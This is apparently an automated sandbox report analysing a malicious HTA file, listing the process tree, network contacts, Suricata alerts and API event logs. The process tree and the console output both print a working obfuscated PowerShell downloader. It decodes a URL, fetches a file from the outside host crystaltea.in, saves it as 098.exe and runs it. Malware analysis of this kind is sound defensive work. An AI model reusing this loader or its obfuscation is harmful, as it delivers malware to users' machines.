Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	May 9, 2023, 6:42 p.m.	May 9, 2023, 6:44 p.m.

Size	48.2KB
Type	HTML document, ASCII text, with very long lines
MD5	`246b0b1de71eeffbb03fa02ccf9c0621`
SHA256	`e9f9c78a479d056fa9514f918e816d028e6dc7cc578f2c24703e698732f057fa`
CRC32	`75C06DAB`
ssdeep	`1536:MZdhmegJ4G5SddWeu+xdXqj+9S+XdXqqCYCCXx7PXl+d7Hx/7/1q/7+X3nYg+GHz:8f4SddkfwS/VvIWdn`
Yara	None matched

mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\098.hta
1664
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function pYSLE($V, $Q){[IO.File]::WriteAllBytes($V, $Q)};function cdKJpBF($V){if($V.EndsWith((XYgDFbuR @(40107,40161,40169,40169))) -eq $True){Start-Process (XYgDFbuR @(40175,40178,40171,40161,40169,40169,40112,40111,40107,40162,40181,40162)) $V}else{Start-Process $V}};function CNyWMYuz($Xt){$JI = New-Object (XYgDFbuR @(40139,40162,40177,40107,40148,40162,40159,40128,40169,40166,40162,40171,40177));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$Q = $JI.DownloadData($Xt);return $Q};function XYgDFbuR($TO){$eF=40061;$VN=$Null;foreach($HA in $TO){$VN+=[char]($HA-$eF)};return $VN};function YuPMhMlF(){$fEikKtIVl = $env:APPDATA + '\';$LDTlYDCLf = CNyWMYuz (XYgDFbuR @(40165,40177,40177,40173,40176,40119,40108,40108,40160,40175,40182,40176,40177,40158,40169,40177,40162,40158,40107,40166,40171,40108,40160,40165,40166,40171,40108,40109,40118,40117,40107,40162,40181,40162));$StIlhBZc = $fEikKtIVl + '098.exe';pYSLE $StIlhBZc $LDTlYDCLf;cdKJpBF $StIlhBZc;;;;}YuPMhMlF;
  2144

Name	Response	Post-Analysis Lookup
crystaltea.in	A 192.185.110.133	192.185.110.133

IP Address	Status	Action
164.124.101.2	Active	Moloch
192.185.110.133	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49165 -> 192.185.110.133:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49164 -> 192.185.110.133:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

No Suricata TLS

Queries for the computername (7 events)

Time & API	Arguments	Status	Return
GetComputerNameW May 9, 2023, 6:42 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 9, 2023, 6:42 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 9, 2023, 6:42 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 9, 2023, 6:42 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 9, 2023, 6:42 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 9, 2023, 6:42 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 9, 2023, 6:42 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent May 9, 2023, 6:42 p.m.			0	0

Command line console output was observed (50 out of 68 events)

Time & API	Arguments	Status	Return
WriteConsoleW May 9, 2023, 6:42 p.m.	buffer: Exception setting "SecurityProtocol": "Cannot convert null to type "System.Net. console_handle: 0x00000023	1	1
WriteConsoleW May 9, 2023, 6:42 p.m.	buffer: SecurityProtocolType" due to invalid enumeration values. Specify one of the fol console_handle: 0x0000002f	1	1
WriteConsoleW May 9, 2023, 6:42 p.m.	buffer: lowing enumeration values and try again. The possible enumeration values are "S console_handle: 0x0000003b	1	1
WriteConsoleW May 9, 2023, 6:42 p.m.	buffer: sl3, Tls"." console_handle: 0x00000047	1	1
WriteConsoleW May 9, 2023, 6:42 p.m.	buffer: At line:1 char:430 console_handle: 0x00000053	1	1
WriteConsoleW May 9, 2023, 6:42 p.m.	buffer: + function pYSLE($V, $Q){[IO.File]::WriteAllBytes($V, $Q)};function cdKJpBF($V) console_handle: 0x0000005f	1	1
WriteConsoleW May 9, 2023, 6:42 p.m.	buffer: {if($V.EndsWith((XYgDFbuR @(40107,40161,40169,40169))) -eq $True){Start-Process console_handle: 0x0000006b	1	1
WriteConsoleW May 9, 2023, 6:42 p.m.	buffer: (XYgDFbuR @(40175,40178,40171,40161,40169,40169,40112,40111,40107,40162,40181, console_handle: 0x00000077	1	1
WriteConsoleW May 9, 2023, 6:42 p.m.	buffer: 40162)) $V}else{Start-Process $V}};function CNyWMYuz($Xt){$JI = New-Object (XYg console_handle: 0x00000083	1	1
WriteConsoleW May 9, 2023, 6:42 p.m.	buffer: DFbuR @(40139,40162,40177,40107,40148,40162,40159,40128,40169,40166,40162,40171 console_handle: 0x0000008f	1	1
WriteConsoleW May 9, 2023, 6:42 p.m.	buffer: ,40177));[Net.ServicePointManager]:: <<<< SecurityProtocol = [Net.SecurityProto console_handle: 0x0000009b	1	1
WriteConsoleW May 9, 2023, 6:42 p.m.	buffer: colType]::TLS12;$Q = $JI.DownloadData($Xt);return $Q};function XYgDFbuR($TO){$e console_handle: 0x000000a7	1	1
WriteConsoleW May 9, 2023, 6:42 p.m.	buffer: F=40061;$VN=$Null;foreach($HA in $TO){$VN+=[char]($HA-$eF)};return $VN};functio console_handle: 0x000000b3	1	1
WriteConsoleW May 9, 2023, 6:42 p.m.	buffer: n YuPMhMlF(){$fEikKtIVl = $env:APPDATA + '\';$LDTlYDCLf = CNyWMYuz (XYgDFbuR @( console_handle: 0x000000bf	1	1
WriteConsoleW May 9, 2023, 6:42 p.m.	buffer: 108,40109,40118,40117,40107,40162,40181,40162));$StIlhBZc = $fEikKtIVl + '098.e console_handle: 0x000000e3	1	1
WriteConsoleW May 9, 2023, 6:42 p.m.	buffer: xe';pYSLE $StIlhBZc $LDTlYDCLf;cdKJpBF $StIlhBZc;;;;}YuPMhMlF; console_handle: 0x000000ef	1	1
WriteConsoleW May 9, 2023, 6:42 p.m.	buffer: + CategoryInfo : InvalidOperation: (:) [], RuntimeException console_handle: 0x000000fb	1	1
WriteConsoleW May 9, 2023, 6:42 p.m.	buffer: + FullyQualifiedErrorId : PropertyAssignmentException console_handle: 0x00000107	1	1
WriteConsoleW May 9, 2023, 6:42 p.m.	buffer: Exception calling "DownloadData" with "1" argument(s): "The underlying connecti console_handle: 0x00000127	1	1
WriteConsoleW May 9, 2023, 6:42 p.m.	buffer: on was closed: An unexpected error occurred on a send." console_handle: 0x00000133	1	1
WriteConsoleW May 9, 2023, 6:42 p.m.	buffer: At line:1 char:504 console_handle: 0x0000013f	1	1
WriteConsoleW May 9, 2023, 6:42 p.m.	buffer: + function pYSLE($V, $Q){[IO.File]::WriteAllBytes($V, $Q)};function cdKJpBF($V) console_handle: 0x0000014b	1	1
WriteConsoleW May 9, 2023, 6:42 p.m.	buffer: {if($V.EndsWith((XYgDFbuR @(40107,40161,40169,40169))) -eq $True){Start-Process console_handle: 0x00000157	1	1
WriteConsoleW May 9, 2023, 6:42 p.m.	buffer: (XYgDFbuR @(40175,40178,40171,40161,40169,40169,40112,40111,40107,40162,40181, console_handle: 0x00000163	1	1
WriteConsoleW May 9, 2023, 6:42 p.m.	buffer: 40162)) $V}else{Start-Process $V}};function CNyWMYuz($Xt){$JI = New-Object (XYg console_handle: 0x0000016f	1	1
WriteConsoleW May 9, 2023, 6:42 p.m.	buffer: DFbuR @(40139,40162,40177,40107,40148,40162,40159,40128,40169,40166,40162,40171 console_handle: 0x0000017b	1	1
WriteConsoleW May 9, 2023, 6:42 p.m.	buffer: ,40177));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolTyp console_handle: 0x00000187	1	1
WriteConsoleW May 9, 2023, 6:42 p.m.	buffer: e]::TLS12;$Q = $JI.DownloadData <<<< ($Xt);return $Q};function XYgDFbuR($TO){$e console_handle: 0x00000193	1	1
WriteConsoleW May 9, 2023, 6:42 p.m.	buffer: F=40061;$VN=$Null;foreach($HA in $TO){$VN+=[char]($HA-$eF)};return $VN};functio console_handle: 0x0000019f	1	1
WriteConsoleW May 9, 2023, 6:42 p.m.	buffer: n YuPMhMlF(){$fEikKtIVl = $env:APPDATA + '\';$LDTlYDCLf = CNyWMYuz (XYgDFbuR @( console_handle: 0x000001ab	1	1
WriteConsoleW May 9, 2023, 6:42 p.m.	buffer: 108,40109,40118,40117,40107,40162,40181,40162));$StIlhBZc = $fEikKtIVl + '098.e console_handle: 0x000001cf	1	1
WriteConsoleW May 9, 2023, 6:42 p.m.	buffer: xe';pYSLE $StIlhBZc $LDTlYDCLf;cdKJpBF $StIlhBZc;;;;}YuPMhMlF; console_handle: 0x000001db	1	1
WriteConsoleW May 9, 2023, 6:42 p.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x000001e7	1	1
WriteConsoleW May 9, 2023, 6:42 p.m.	buffer: + FullyQualifiedErrorId : DotNetMethodException console_handle: 0x000001f3	1	1
WriteConsoleW May 9, 2023, 6:42 p.m.	buffer: Exception calling "WriteAllBytes" with "2" argument(s): "Value cannot be null. console_handle: 0x00000213	1	1
WriteConsoleW May 9, 2023, 6:42 p.m.	buffer: Parameter name: bytes" console_handle: 0x0000021f	1	1
WriteConsoleW May 9, 2023, 6:42 p.m.	buffer: At line:1 char:48 console_handle: 0x0000022b	1	1
WriteConsoleW May 9, 2023, 6:42 p.m.	buffer: + function pYSLE($V, $Q){[IO.File]::WriteAllBytes <<<< ($V, $Q)};function cdKJp console_handle: 0x00000237	1	1
WriteConsoleW May 9, 2023, 6:42 p.m.	buffer: BF($V){if($V.EndsWith((XYgDFbuR @(40107,40161,40169,40169))) -eq $True){Start-P console_handle: 0x00000243	1	1
WriteConsoleW May 9, 2023, 6:42 p.m.	buffer: rocess (XYgDFbuR @(40175,40178,40171,40161,40169,40169,40112,40111,40107,40162, console_handle: 0x0000024f	1	1
WriteConsoleW May 9, 2023, 6:42 p.m.	buffer: 40181,40162)) $V}else{Start-Process $V}};function CNyWMYuz($Xt){$JI = New-Objec console_handle: 0x0000025b	1	1
WriteConsoleW May 9, 2023, 6:42 p.m.	buffer: t (XYgDFbuR @(40139,40162,40177,40107,40148,40162,40159,40128,40169,40166,40162 console_handle: 0x00000267	1	1
WriteConsoleW May 9, 2023, 6:42 p.m.	buffer: ,40171,40177));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProto console_handle: 0x00000273	1	1
WriteConsoleW May 9, 2023, 6:42 p.m.	buffer: colType]::TLS12;$Q = $JI.DownloadData($Xt);return $Q};function XYgDFbuR($TO){$e console_handle: 0x0000027f	1	1
WriteConsoleW May 9, 2023, 6:42 p.m.	buffer: F=40061;$VN=$Null;foreach($HA in $TO){$VN+=[char]($HA-$eF)};return $VN};functio console_handle: 0x0000028b	1	1
WriteConsoleW May 9, 2023, 6:42 p.m.	buffer: n YuPMhMlF(){$fEikKtIVl = $env:APPDATA + '\';$LDTlYDCLf = CNyWMYuz (XYgDFbuR @( console_handle: 0x00000297	1	1
WriteConsoleW May 9, 2023, 6:42 p.m.	buffer: 108,40109,40118,40117,40107,40162,40181,40162));$StIlhBZc = $fEikKtIVl + '098.e console_handle: 0x000002bb	1	1
WriteConsoleW May 9, 2023, 6:42 p.m.	buffer: xe';pYSLE $StIlhBZc $LDTlYDCLf;cdKJpBF $StIlhBZc;;;;}YuPMhMlF; console_handle: 0x000002c7	1	1
WriteConsoleW May 9, 2023, 6:42 p.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x000002d3	1	1
WriteConsoleW May 9, 2023, 6:42 p.m.	buffer: + FullyQualifiedErrorId : DotNetMethodException console_handle: 0x000002df	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 53 events)

Time & API	Arguments	Status	Return
CryptExportKey May 9, 2023, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c3968 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c4068 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c4068 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c4068 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c3728 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c3728 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c3728 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c3728 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c3728 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c3728 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c4068 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c4068 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c4068 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c3d68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c3d68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c3d68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c41a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c3d68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c3d68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c3d68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c3d68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c3d68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c3d68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c3d68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c4268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c4268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c4268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c4268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c4268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c4268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c4268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c4268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c4268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c4268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c4268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c4268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c4268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c4268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c42e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c42e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c42e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c42e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c42e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c42e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c42e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c42e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c38a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c38a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c38a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c38a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx May 9, 2023, 6:42 p.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 167 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory May 9, 2023, 6:42 p.m.	process_identifier: 2144 region_size: 1966080 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02610000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:42 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 9, 2023, 6:42 p.m.	process_identifier: 2144 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x719b1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:42 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0251a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 9, 2023, 6:42 p.m.	process_identifier: 2144 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x719b2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:42 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02512000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:42 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02522000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:42 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027b1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:42 p.m.	process_identifier: 2144 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027b2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:42 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0254a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:42 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02523000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:42 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02524000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:42 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0259b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:42 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02597000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:42 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0251b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:42 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02542000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:42 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02595000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:42 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02525000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:42 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0254c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:42 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:42 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02526000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:42 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0259c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:42 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02543000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:42 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02544000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:42 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02545000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:42 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02546000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:42 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02547000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
